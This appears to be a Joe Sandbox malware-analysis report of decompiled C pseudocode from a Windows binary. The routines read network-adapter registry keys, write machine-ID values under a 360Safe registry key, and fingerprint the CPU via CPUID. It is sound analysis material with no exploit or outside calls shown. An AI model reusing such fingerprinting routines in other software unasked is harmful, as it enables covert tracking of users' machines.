											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t86)) + 4))))(_t86);
										}
										_v4 = 0;
										if(_t128 != 0) {
											RegCloseKey(_t128);
											_v1108 = 0;
										}
										_v1104 = 0;
										_t91 = 0;
									}
								}
							} else {
								L5:
								_v4 = _t91;
								if(_t128 != _t91) {
									RegCloseKey(_t128);
									_v1108 = _t91;
								}
								_v1104 = _t91;
							}
						}
						_t112 = _v1096;
						_t71 = _v1084 + 1;
						_v1084 = _t71;
						if(_t71 < 0x100) {
							continue;
						}
						break;
					}
					_v4 = 0xffffffff;
					asm("sbb esi, esi");
					_t123 =  ~( ~( *((intOrPtr*)(_v1092 + 0x10)) -  *((intOrPtr*)(_v1092 + 0xc)) & 0xfffffffc));
					if(_t112 != _t91) {
						RegCloseKey(_t112);
					}
					_t69 = _t123;
				}
				 *[fs:0x0] = _v12;
				_pop(_t111);
				_pop(_t117);
				_pop(_t92);
				return E00D0071A(_t69, _t92, _v20 ^ _t130, _t106, _t111, _t117);
			}







































                                                                                                                                                                                          0x00c948d0
                                                                                                                                                                                          0x00c948d2
                                                                                                                                                                                          0x00c948dd
                                                                                                                                                                                          0x00c948de
                                                                                                                                                                                          0x00c948e4
                                                                                                                                                                                          0x00c948eb
                                                                                                                                                                                          0x00c948f6
                                                                                                                                                                                          0x00c948fd
                                                                                                                                                                                          0x00c94905
                                                                                                                                                                                          0x00c94912
                                                                                                                                                                                          0x00c94914
                                                                                                                                                                                          0x00c94918
                                                                                                                                                                                          0x00c9491c
                                                                                                                                                                                          0x00c9492d
                                                                                                                                                                                          0x00c94939
                                                                                                                                                                                          0x00c94945
                                                                                                                                                                                          0x00c94a07
                                                                                                                                                                                          0x00c9494b
                                                                                                                                                                                          0x00c9494b
                                                                                                                                                                                          0x00c9494f
                                                                                                                                                                                          0x00c94951
                                                                                                                                                                                          0x00c94955
                                                                                                                                                                                          0x00c94959
                                                                                                                                                                                          0x00c94960
                                                                                                                                                                                          0x00c9496d
                                                                                                                                                                                          0x00c9497c
                                                                                                                                                                                          0x00c94988
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9498e
                                                                                                                                                                                          0x00c94992
                                                                                                                                                                                          0x00c949a6
                                                                                                                                                                                          0x00c949af
                                                                                                                                                                                          0x00c949bb
                                                                                                                                                                                          0x00c94a0e
                                                                                                                                                                                          0x00c94a15
                                                                                                                                                                                          0x00c949bd
                                                                                                                                                                                          0x00c949bd
                                                                                                                                                                                          0x00c949c6
                                                                                                                                                                                          0x00c949ca
                                                                                                                                                                                          0x00c949d7
                                                                                                                                                                                          0x00c949db
                                                                                                                                                                                          0x00c949e6
                                                                                                                                                                                          0x00c94a22
                                                                                                                                                                                          0x00c94a23
                                                                                                                                                                                          0x00c94a28
                                                                                                                                                                                          0x00c94a2e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94a30
                                                                                                                                                                                          0x00c94a42
                                                                                                                                                                                          0x00c94a51
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94a53
                                                                                                                                                                                          0x00c94a53
                                                                                                                                                                                          0x00c94a5a
                                                                                                                                                                                          0x00c94a67
                                                                                                                                                                                          0x00c94a6f
                                                                                                                                                                                          0x00c94a74
                                                                                                                                                                                          0x00c94a80
                                                                                                                                                                                          0x00c94a89
                                                                                                                                                                                          0x00c94a8d
                                                                                                                                                                                          0x00c94a90
                                                                                                                                                                                          0x00c94a94
                                                                                                                                                                                          0x00c94a9a
                                                                                                                                                                                          0x00c94a9a
                                                                                                                                                                                          0x00c94a9e
                                                                                                                                                                                          0x00c94aa7
                                                                                                                                                                                          0x00c94aaa
                                                                                                                                                                                          0x00c94ab0
                                                                                                                                                                                          0x00c94ab0
                                                                                                                                                                                          0x00c94ab4
                                                                                                                                                                                          0x00c94ab8
                                                                                                                                                                                          0x00c94ab8
                                                                                                                                                                                          0x00c94a51
                                                                                                                                                                                          0x00c949e8
                                                                                                                                                                                          0x00c949e8
                                                                                                                                                                                          0x00c949e8
                                                                                                                                                                                          0x00c949f1
                                                                                                                                                                                          0x00c949f4
                                                                                                                                                                                          0x00c949fa
                                                                                                                                                                                          0x00c949fa
                                                                                                                                                                                          0x00c949fe
                                                                                                                                                                                          0x00c949fe
                                                                                                                                                                                          0x00c949e6
                                                                                                                                                                                          0x00c94abe
                                                                                                                                                                                          0x00c94ac2
                                                                                                                                                                                          0x00c94ac8
                                                                                                                                                                                          0x00c94acc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94acc
                                                                                                                                                                                          0x00c94adc
                                                                                                                                                                                          0x00c94aec
                                                                                                                                                                                          0x00c94aee
                                                                                                                                                                                          0x00c94af2
                                                                                                                                                                                          0x00c94af5
                                                                                                                                                                                          0x00c94af5
                                                                                                                                                                                          0x00c94afb
                                                                                                                                                                                          0x00c94afb
                                                                                                                                                                                          0x00c94b04
                                                                                                                                                                                          0x00c94b0c
                                                                                                                                                                                          0x00c94b0d
                                                                                                                                                                                          0x00c94b0f
                                                                                                                                                                                          0x00c94b24

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318},00000000,00000008,?,8A9E1774,00000000,?,?,00000000), ref: 00C9493D
                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32 ref: 00C94980
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?), ref: 00C949B3
                                                                                                                                                                                            • Part of subcall function 00C92550: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00C90027), ref: 00C92577
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,00000000), ref: 00C949F4
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C94AAA
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C94AF5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • NetCfgInstanceId, xrefs: 00C94A30
                                                                                                                                                                                          • SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}, xrefs: 00C94928
                                                                                                                                                                                          • BusType, xrefs: 00C949C1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Close$Open$EnumQueryValue
                                                                                                                                                                                          • String ID: BusType$NetCfgInstanceId$SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
                                                                                                                                                                                          • API String ID: 1772848689-2100781267
                                                                                                                                                                                          • Opcode ID: 0bc6a7c6292053b35cf32f6cc60d1d4ca3bab20722151ce79aee893eeb2b0067
                                                                                                                                                                                          • Instruction ID: beb9f8c677711e8b7a0eda143b01abd1f67f91153dfebcec25e93cd96952a6fe
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bc6a7c6292053b35cf32f6cc60d1d4ca3bab20722151ce79aee893eeb2b0067
                                                                                                                                                                                          • Instruction Fuzzy Hash: D5619FB15083419FC724CF68C884A5BFBE8FBC9714F404A2DF59993291D770AA09CB66
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C90180 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 116registrystringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E00C90180(char** __ecx, char** _a4) {
				int _v4;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				signed int _t29;
				int _t39;
				long _t40;
				void* _t43;
				int _t46;
				void* _t68;
				char** _t71;
				char* _t73;
				signed int _t74;
				char* _t76;
				void* _t81;
				signed int _t82;

				_push(0xffffffff);
				_push(0xd38918);
				_push( *[fs:0x0]);
				_t82 = _t81 - 0xc;
				_t29 =  *0xd64070; // 0x8a9e1774
				_push(_t29 ^ _t82);
				 *[fs:0x0] =  &_v12;
				_t71 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_v4 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\360Safe\\Liveup", 0, 0x202,  &_v24) != 0) {
					 *[fs:0x0] = _v12;
					return 0;
				} else {
					_t35 =  *_t71;
					_t68 = _v24;
					_v20 = _t68;
					_v16 = 0x200;
					if( *((intOrPtr*)( *_t71 - 0xc)) != 0) {
						_t43 = E00D00DF1(_t64, _t35, _t60);
						_t82 = _t82 + 8;
						if(_t43 != 0) {
							_t76 =  *_t71;
							if((0 | _t76 != 0x00000000) != 0) {
								_t46 = lstrlenW(_t76);
								_t17 = _t46 + 2; // 0x2
								RegSetValueExW(_t68, L"m2_old", 0, 1, _t76, _t46 + _t17);
							}
						}
					}
					_t73 =  *_a4;
					if((0 | _t73 != 0x00000000) != 0) {
						_t39 = lstrlenW(_t73);
						_t22 = _t39 + 2; // 0x2
						_t40 = RegSetValueExW(_t68, L"m2", 0, 1, _t73, _t39 + _t22);
					} else {
						_t40 = 0xd;
					}
					_v4 = 0xffffffff;
					_t74 = 0 | _t40 == 0x00000000;
					if(_t68 != 0) {
						RegCloseKey(_t68);
					}
					 *[fs:0x0] = _v12;
					return _t74;
				}
			}




















                                                                                                                                                                                          0x00c90180
                                                                                                                                                                                          0x00c90182
                                                                                                                                                                                          0x00c9018d
                                                                                                                                                                                          0x00c9018e
                                                                                                                                                                                          0x00c90195
                                                                                                                                                                                          0x00c9019c
                                                                                                                                                                                          0x00c901a1
                                                                                                                                                                                          0x00c901a7
                                                                                                                                                                                          0x00c901ab
                                                                                                                                                                                          0x00c901af
                                                                                                                                                                                          0x00c901c3
                                                                                                                                                                                          0x00c901cc
                                                                                                                                                                                          0x00c901d8
                                                                                                                                                                                          0x00c902b3
                                                                                                                                                                                          0x00c902c2
                                                                                                                                                                                          0x00c901de
                                                                                                                                                                                          0x00c901de
                                                                                                                                                                                          0x00c901e3
                                                                                                                                                                                          0x00c901ed
                                                                                                                                                                                          0x00c901f1
                                                                                                                                                                                          0x00c901fb
                                                                                                                                                                                          0x00c9021a
                                                                                                                                                                                          0x00c9021f
                                                                                                                                                                                          0x00c90224
                                                                                                                                                                                          0x00c90226
                                                                                                                                                                                          0x00c90231
                                                                                                                                                                                          0x00c90234
                                                                                                                                                                                          0x00c9023a
                                                                                                                                                                                          0x00c90249
                                                                                                                                                                                          0x00c90249
                                                                                                                                                                                          0x00c90231
                                                                                                                                                                                          0x00c90224
                                                                                                                                                                                          0x00c9024f
                                                                                                                                                                                          0x00c9025a
                                                                                                                                                                                          0x00c90264
                                                                                                                                                                                          0x00c9026a
                                                                                                                                                                                          0x00c90279
                                                                                                                                                                                          0x00c9025c
                                                                                                                                                                                          0x00c9025c
                                                                                                                                                                                          0x00c9025c
                                                                                                                                                                                          0x00c90282
                                                                                                                                                                                          0x00c9028a
                                                                                                                                                                                          0x00c9028e
                                                                                                                                                                                          0x00c90291
                                                                                                                                                                                          0x00c90291
                                                                                                                                                                                          0x00c9029d
                                                                                                                                                                                          0x00c902ac
                                                                                                                                                                                          0x00c902ac

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\360Safe\Liveup,00000000,00000202,8A9E1774,8A9E1774,00000000,?,?,00000000), ref: 00C901D0
                                                                                                                                                                                          • __wcsicoll.LIBCMT ref: 00C9021A
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,00000000), ref: 00C90234
                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,m2_old,00000000,00000001,?,00000002,?,00000000), ref: 00C90249
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000010,00D39140), ref: 00C90264
                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,00D48AA8,00000000,00000001,?,00000002), ref: 00C90279
                                                                                                                                                                                            • Part of subcall function 00C8DF10: __CxxThrowException@8.LIBCMT ref: 00C8DF22
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C90291
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Valuelstrlen$CloseException@8OpenThrow__wcsicoll
                                                                                                                                                                                          • String ID: SOFTWARE\360Safe\Liveup$m2_old
                                                                                                                                                                                          • API String ID: 1256771195-291699374
                                                                                                                                                                                          • Opcode ID: 471de24a1b338fb2b12ec51da13f086848ce368c0b8c7a1714536176dc51cc5b
                                                                                                                                                                                          • Instruction ID: 0c76b9bc9880ed0a4f9ec376b1d863fabfd5bb7c9114f6695f972737abb890f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 471de24a1b338fb2b12ec51da13f086848ce368c0b8c7a1714536176dc51cc5b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 86311472604704AFC610DF54DC89E2FBBE9FB89710F21492DF495D3380C639A9089BA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8F9D0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 198COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E00C8F9D0(void* __ebp, intOrPtr* _a4) {
				char _v4;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				struct _CRITICAL_SECTION* _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t87;
				signed int _t89;
				intOrPtr* _t101;
				void* _t105;
				intOrPtr* _t117;
				void* _t122;
				intOrPtr* _t127;
				intOrPtr _t143;
				intOrPtr _t144;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t151;
				intOrPtr _t153;
				intOrPtr _t154;
				void* _t156;
				void* _t158;
				intOrPtr* _t161;
				intOrPtr* _t162;
				void* _t164;
				intOrPtr* _t166;
				void* _t168;
				signed int _t169;
				void* _t170;
				intOrPtr _t172;

				_push(0xffffffff);
				_push(0xd38b98);
				_push( *[fs:0x0]);
				_t169 = _t168 - 0x7c;
				_t87 =  *0xd64070; // 0x8a9e1774
				_v16 = _t87 ^ _t169;
				_push(_t156);
				_t89 =  *0xd64070; // 0x8a9e1774
				_push(_t89 ^ _t169);
				 *[fs:0x0] =  &_v12;
				_t166 = _a4;
				_v136 = 0xffffffff;
				_v132 = 0;
				_v128 = 0;
				_v124 = 0;
				_v120 = 0;
				EnterCriticalSection(0xd68dd0);
				_v116 = 0xd68dd0;
				_v4 = 0;
				_t172 =  *0xd68ce8; // 0x0
				if(_t172 == 0) {
					_v112 = 0;
					_v108 = 0;
					_v104 = 0;
					_v100 = 0;
					_v96 = 0;
					_v92 = 0;
					_v88 = 0;
					_v84 = 0;
					asm("cpuid");
					_t161 =  &_v136;
					 *_t161 = 0;
					 *((intOrPtr*)(_t161 + 4)) = 0;
					 *((intOrPtr*)(_t161 + 8)) = 0;
					 *((intOrPtr*)(_t161 + 0xc)) = _t144;
					_t145 = _v128;
					_v112 = _v132;
					_v108 = _v124;
					_v104 = _t145;
					if(_v136 >= 1) {
						asm("cpuid");
						 *_t161 = 1;
						 *((intOrPtr*)(_t161 + 4)) = 0;
						 *((intOrPtr*)(_t161 + 8)) = 0;
						 *((intOrPtr*)(_t161 + 0xc)) = _t145;
						_v120 = _v136;
					}
					asm("cpuid");
					_t162 =  &_v136;
					 *_t162 = 0x80000000;
					 *((intOrPtr*)(_t162 + 4)) = 0;
					 *((intOrPtr*)(_t162 + 8)) = 0;
					 *((intOrPtr*)(_t162 + 0xc)) = _t145;
					E00D006A0(_t156,  &_v80, 0, 0x40);
					_t170 = _t169 + 0xc;
					if(_v136 >= 0x80000004) {
						asm("cpuid");
						 *_t162 = 0x80000002;
						 *((intOrPtr*)(_t162 + 4)) = 0;
						 *((intOrPtr*)(_t162 + 8)) = 0;
						 *((intOrPtr*)(_t162 + 0xc)) = _t145;
						_v76 = _v132;
						_v72 = _v128;
						_v80 = _v136;
						_t153 = _v124;
						_v68 = _t153;
						asm("cpuid");
						 *_t162 = 0x80000003;
						 *((intOrPtr*)(_t162 + 4)) = 0;
						 *((intOrPtr*)(_t162 + 8)) = 0;
						 *((intOrPtr*)(_t162 + 0xc)) = _t153;
						_t154 = _v128;
						_v64 = _v136;
						_v60 = _v132;
						_v52 = _v124;
						_v56 = _t154;
						asm("cpuid");
						 *_t162 = 0x80000004;
						 *((intOrPtr*)(_t162 + 4)) = 0;
						 *((intOrPtr*)(_t162 + 8)) = 0;
						 *((intOrPtr*)(_t162 + 0xc)) = _t154;
						_v48 = _v136;
						_v44 = _v132;
						_v40 = _v128;
						_v36 = _v124;
					}
					StrTrimA( &_v112, " ");
					StrTrimA( &_v84, " ");
					_t127 = "GenuineIotel";
					_t101 =  &_v120;
					while(1) {
						_t147 =  *_t101;
						if(_t147 !=  *_t127) {
							break;
						}
						if(_t147 == 0) {
							L13:
							_t101 = 0;
						} else {
							_t151 =  *((intOrPtr*)(_t101 + 1));
							if(_t151 !=  *((intOrPtr*)(_t127 + 1))) {
								break;
							} else {
								_t101 = _t101 + 2;
								_t127 = _t127 + 2;
								if(_t151 != 0) {
									continue;
								} else {
									goto L13;
								}
							}
						}
						L15:
						if(_t101 == 0) {
							E00C92750("GenuineIntel",  &_v120, 0x20);
						}
						_push( &_v88);
						_push(_v128);
						E00C920F0("%s,%x,%s",  &_v120);
						_t169 = _t170 + 0x10;
						_t149 = 0x80;
						_t105 = E00C92750( *_t166, 0xd68ce8, 0x80);
						goto L18;
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L15;
				} else {
					_t117 = 0xd68ce8;
					_t11 = _t117 + 1; // 0xd68ce9
					_t149 = _t11;
					do {
						_t143 =  *_t117;
						_t117 = _t117 + 1;
					} while (_t143 != 0);
					_t105 = E00C91B50(_t166, _t143, _t117 - _t149, 0xd68ce8);
				}
				L18:
				LeaveCriticalSection(0xd68dd0);
				 *[fs:0x0] = _v20;
				_pop(_t158);
				_pop(_t164);
				_pop(_t122);
				return E00D0071A(_t105, _t122, _v24 ^ _t169, _t149, _t158, _t164);
			}





























































                                                                                                                                                                                          0x00c8f9d0
                                                                                                                                                                                          0x00c8f9d2
                                                                                                                                                                                          0x00c8f9dd
                                                                                                                                                                                          0x00c8f9de
                                                                                                                                                                                          0x00c8f9e1
                                                                                                                                                                                          0x00c8f9e8
                                                                                                                                                                                          0x00c8f9ef
                                                                                                                                                                                          0x00c8f9f0
                                                                                                                                                                                          0x00c8f9f7
                                                                                                                                                                                          0x00c8f9ff
                                                                                                                                                                                          0x00c8fa05
                                                                                                                                                                                          0x00c8fa15
                                                                                                                                                                                          0x00c8fa1d
                                                                                                                                                                                          0x00c8fa21
                                                                                                                                                                                          0x00c8fa25
                                                                                                                                                                                          0x00c8fa29
                                                                                                                                                                                          0x00c8fa2d
                                                                                                                                                                                          0x00c8fa33
                                                                                                                                                                                          0x00c8fa3b
                                                                                                                                                                                          0x00c8fa42
                                                                                                                                                                                          0x00c8fa48
                                                                                                                                                                                          0x00c8fa70
                                                                                                                                                                                          0x00c8fa74
                                                                                                                                                                                          0x00c8fa78
                                                                                                                                                                                          0x00c8fa7e
                                                                                                                                                                                          0x00c8fa82
                                                                                                                                                                                          0x00c8fa86
                                                                                                                                                                                          0x00c8fa8a
                                                                                                                                                                                          0x00c8fa8e
                                                                                                                                                                                          0x00c8fa92
                                                                                                                                                                                          0x00c8fa94
                                                                                                                                                                                          0x00c8fa98
                                                                                                                                                                                          0x00c8fa9a
                                                                                                                                                                                          0x00c8fa9d
                                                                                                                                                                                          0x00c8faa0
                                                                                                                                                                                          0x00c8faab
                                                                                                                                                                                          0x00c8faaf
                                                                                                                                                                                          0x00c8fab8
                                                                                                                                                                                          0x00c8fabc
                                                                                                                                                                                          0x00c8fac4
                                                                                                                                                                                          0x00c8fac8
                                                                                                                                                                                          0x00c8faca
                                                                                                                                                                                          0x00c8facc
                                                                                                                                                                                          0x00c8facf
                                                                                                                                                                                          0x00c8fad2
                                                                                                                                                                                          0x00c8fad9
                                                                                                                                                                                          0x00c8fad9
                                                                                                                                                                                          0x00c8fae4
                                                                                                                                                                                          0x00c8fae6
                                                                                                                                                                                          0x00c8faea
                                                                                                                                                                                          0x00c8faec
                                                                                                                                                                                          0x00c8faef
                                                                                                                                                                                          0x00c8fafb
                                                                                                                                                                                          0x00c8fafe
                                                                                                                                                                                          0x00c8fb03
                                                                                                                                                                                          0x00c8fb0e
                                                                                                                                                                                          0x00c8fb1b
                                                                                                                                                                                          0x00c8fb1d
                                                                                                                                                                                          0x00c8fb1f
                                                                                                                                                                                          0x00c8fb22
                                                                                                                                                                                          0x00c8fb25
                                                                                                                                                                                          0x00c8fb34
                                                                                                                                                                                          0x00c8fb38
                                                                                                                                                                                          0x00c8fb3c
                                                                                                                                                                                          0x00c8fb40
                                                                                                                                                                                          0x00c8fb46
                                                                                                                                                                                          0x00c8fb4f
                                                                                                                                                                                          0x00c8fb51
                                                                                                                                                                                          0x00c8fb53
                                                                                                                                                                                          0x00c8fb56
                                                                                                                                                                                          0x00c8fb59
                                                                                                                                                                                          0x00c8fb64
                                                                                                                                                                                          0x00c8fb68
                                                                                                                                                                                          0x00c8fb70
                                                                                                                                                                                          0x00c8fb74
                                                                                                                                                                                          0x00c8fb7a
                                                                                                                                                                                          0x00c8fb83
                                                                                                                                                                                          0x00c8fb85
                                                                                                                                                                                          0x00c8fb87
                                                                                                                                                                                          0x00c8fb8a
                                                                                                                                                                                          0x00c8fb8d
                                                                                                                                                                                          0x00c8fb9c
                                                                                                                                                                                          0x00c8fba4
                                                                                                                                                                                          0x00c8fba8
                                                                                                                                                                                          0x00c8fbac
                                                                                                                                                                                          0x00c8fbac
                                                                                                                                                                                          0x00c8fbc0
                                                                                                                                                                                          0x00c8fbcc
                                                                                                                                                                                          0x00c8fbce
                                                                                                                                                                                          0x00c8fbd3
                                                                                                                                                                                          0x00c8fbd7
                                                                                                                                                                                          0x00c8fbd7
                                                                                                                                                                                          0x00c8fbdb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8fbdf
                                                                                                                                                                                          0x00c8fbf3
                                                                                                                                                                                          0x00c8fbf3
                                                                                                                                                                                          0x00c8fbe1
                                                                                                                                                                                          0x00c8fbe1
                                                                                                                                                                                          0x00c8fbe7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8fbe9
                                                                                                                                                                                          0x00c8fbe9
                                                                                                                                                                                          0x00c8fbec
                                                                                                                                                                                          0x00c8fbf1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8fbf1
                                                                                                                                                                                          0x00c8fbe7
                                                                                                                                                                                          0x00c8fbfc
                                                                                                                                                                                          0x00c8fbfe
                                                                                                                                                                                          0x00c8fc0e
                                                                                                                                                                                          0x00c8fc0e
                                                                                                                                                                                          0x00c8fc1b
                                                                                                                                                                                          0x00c8fc1c
                                                                                                                                                                                          0x00c8fc29
                                                                                                                                                                                          0x00c8fc31
                                                                                                                                                                                          0x00c8fc34
                                                                                                                                                                                          0x00c8fc3e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8fc3e
                                                                                                                                                                                          0x00c8fbf7
                                                                                                                                                                                          0x00c8fbf9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8fa4a
                                                                                                                                                                                          0x00c8fa4a
                                                                                                                                                                                          0x00c8fa4f
                                                                                                                                                                                          0x00c8fa4f
                                                                                                                                                                                          0x00c8fa52
                                                                                                                                                                                          0x00c8fa52
                                                                                                                                                                                          0x00c8fa54
                                                                                                                                                                                          0x00c8fa55
                                                                                                                                                                                          0x00c8fa64
                                                                                                                                                                                          0x00c8fa64
                                                                                                                                                                                          0x00c8fc43
                                                                                                                                                                                          0x00c8fc48
                                                                                                                                                                                          0x00c8fc55
                                                                                                                                                                                          0x00c8fc5d
                                                                                                                                                                                          0x00c8fc5e
                                                                                                                                                                                          0x00c8fc60
                                                                                                                                                                                          0x00c8fc72

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 00C8FA2D
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8FAFE
                                                                                                                                                                                          • StrTrimA.SHLWAPI(?,00D48A4C,?,?,?,?,?,?,?,?,?,?,?,?,-00000010,00D38B98), ref: 00C8FBC0
                                                                                                                                                                                          • StrTrimA.SHLWAPI(?,00D48A4C,?,?,?,?,?,?,?,?,?,?,?,?,-00000010,00D38B98), ref: 00C8FBCC
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00D68DD0,?,?,?,?,?,?,?), ref: 00C8FC48
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
